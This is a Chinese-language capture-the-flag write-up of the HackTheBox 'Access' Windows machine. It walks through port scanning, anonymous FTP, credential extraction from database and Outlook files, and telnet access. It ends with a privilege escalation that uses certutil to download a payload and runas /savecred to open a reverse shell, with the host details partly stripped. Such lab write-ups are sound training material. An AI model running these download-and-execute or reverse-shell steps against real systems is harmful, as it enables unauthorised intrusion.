2023年11月23日发(作者:)

hackthebox-AccessWriteup

⼀、摘要

Acces是搭建在Windows平台上的⼀道CTF题⽬,探究服务器上的渗透测试

⼆、信息搜集

题⽬就只给出⼀个IP10.10.10.98

⾸先通过Nmap进⾏端⼝⽅⾯的探测

nmap -sV -sT -sC 10.10.10.98

服务器⼀共开放了21/Ftp23/Telnet80/Http端⼝,优先⽅问Http去看看⽹站

三、Web端测试

访问Web端⼝时,就出现了⼀个机房的照⽚,但是并没有从中看出什么端倪。

随后利⽤gobuster对⽹站⽬录进⾏了枚举

只跑到/aspnet_client页⾯

/aspnet_client403禁⽌的

四、另寻他路

之前Nmap扫描的时候有在21端⼝后⾯出现⼀句话

ftp-anon: Anonymous FTP login allowed (FTP code 230)

告诉我们FTP可以匿名登陆

进⼊Backups发现有个mdb⽂件,随后下载它

不得不说太⼤了

emmmm,不知道什么原因,随后请教⼤佬。说是要以⼆进制⽅式去下载⽂件,可以防⽌数据的丢失

如果是linux系统,利⽤mdbtools⼯具打开

mdb-tables

其中有个auth_user表名值得关注

mdb-export auth_user

其中engineer关键词很熟悉,正好是FTP上的另⼀个⽬录的

ftp上打开另⼀个⽬录,发现⼀个ZIP⽂件,并下载

发现打开提取⽂件需要密码

这⾥遇到个⽑病,估计是解压缩的问题,密码⼀直错误,最后换到Kali下居然就可以

pstMicrosoft Outlook电⼦邮件⽂件夹

直接下载⼀个Outlook查看了邮件

他说4Cc3ssC0ntr0ller就是账户security的密码

随后想到开放了23端⼝,便Telnet上去

五、权限提升

因为在CTF⾥,提权⼀般有⾃带的漏洞⽂件,如⼀个软件、⼀个脚本等

所以按照思路,去找相关⽂件

⼀般来,Linux下通过find找有suid的⽂件;windows下⼀般在⽤户⽬录下

AdministratorPublicsecurity三个⽤户

经判断,只有公共⽬录三可以利⽤的(因为administrator⽬录进不去)

进⼊public桌⾯发现有⼀个lnk⽂件

type查看内容

其中还跟上了/savecred参数,这说明保存了系统的凭证,可以通过这个runas反弹⼀个shell

cmd下可以通过以下命令下载

certutil -urlcache -split -f /

再利⽤runas反弹shell

runas /user:Administrator /savecred " -c 1337"